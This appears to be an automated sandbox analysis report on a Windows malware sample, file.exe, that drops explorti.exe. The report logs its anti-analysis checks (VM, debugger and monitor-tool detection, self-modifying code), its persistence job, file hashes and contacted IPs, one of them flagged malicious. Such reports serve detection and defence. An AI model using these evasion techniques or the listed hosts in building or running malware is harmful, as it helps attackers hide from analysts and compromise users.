Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 2.2.explorti.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 7.2.explorti.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW;

Source: random[1].exe.7.dr	Static PE information: real checksum: 0x1c9af8 should be: 0x192d6f
Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1d392b should be: 0x1d7473
Source: 2c422e6624.exe.7.dr	Static PE information: real checksum: 0x1c9af8 should be: 0x192d6f
Source: file.exe	Static PE information: real checksum: 0x1d392b should be: 0x1d7473

Source: file.exe	Static PE information: section name: entropy: 7.988355421365411
Source: file.exe	Static PE information: section name: mlkfqtwe entropy: 7.953079364825396
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.988355421365411
Source: explorti.exe.0.dr	Static PE information: section name: mlkfqtwe entropy: 7.953079364825396
Source: random[1].exe.7.dr	Static PE information: section name: agodkpeb entropy: 7.953767082543736
Source: 2c422e6624.exe.7.dr	Static PE information: section name: agodkpeb entropy: 7.953767082543736

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Roaming\1000051000\2c422e6624.exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: A734EA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 8BEA7F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: AEE4EE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: C234EA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: A6EA7F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: C9E4EE instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\1000051000\2c422e6624.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7784	Thread sleep time: -50025s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7808	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7808	Thread sleep time: -70035s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7780	Thread sleep time: -30015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7792	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7792	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760	Thread sleep count: 249 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760	Thread sleep time: -7470000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7796	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7796	Thread sleep time: -62031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7788	Thread sleep time: -38019s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: explorti.exe, explorti.exe, 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2896830843.0000000001609000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1702384952.0000000000A44000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1743583589.0000000000BF4000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1743939318.0000000000BF4000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000007.00000002.2896145299.0000000000BF4000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A3645B mov eax, dword ptr fs:[00000030h]		7_2_00A3645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A3A1C2 mov eax, dword ptr fs:[00000030h]		7_2_00A3A1C2

Source: Yara match	File source: 1.2.explorti.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.explorti.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.explorti.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1702163974.0000000000851000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1743759400.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1702733907.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1661714987.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1743489529.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1701960720.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2896017523.0000000000A01000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2334522484.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.19	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	false

ID:	1502480
Product:	CloudBasic
Start time:	20:07:06
Start date:	01.09.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	457d9a15d305df62fe34c5076f3cad9d
SHA1:	7a068fb1e761874759a89534f39c1eb109367448
SHA256:	572d806c0b56d27fe05562301de6a9ed45cda3f36aef2f6e370867d9f3847013
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	PE32 executable (GUI) Intel 80386, for MS Windows	7B9E638699028F93A18B56CD366E2F28	7D0245A5AD7DAA8456FCFEE0FAC2CBB906114B03	85790A170922903D74266882C3A303F3C46656B4C5D6AD8779358E6C522F0D5E
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	PE32 executable (GUI) Intel 80386, for MS Windows	457D9A15D305DF62FE34C5076F3CAD9D	7A068FB1E761874759A89534F39C1EB109367448	572D806C0B56D27FE05562301DE6A9ED45CDA3F36AEF2F6E370867D9F3847013
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Roaming\1000051000\2c422e6624.exe	PE32 executable (GUI) Intel 80386, for MS Windows	7B9E638699028F93A18B56CD366E2F28	7D0245A5AD7DAA8456FCFEE0FAC2CBB906114B03	85790A170922903D74266882C3A303F3C46656B4C5D6AD8779358E6C522F0D5E
C:\Windows\Tasks\explorti.job	data	CD04D88D3042DE77AD56E1DD87DDB979	44940F793B6E5E97C8ABA5B0D02B1D8DADA4C032	703B1B31D41B76C78F3FBE404260DFC0135B87FD331EB2EAF3E164031BE6F056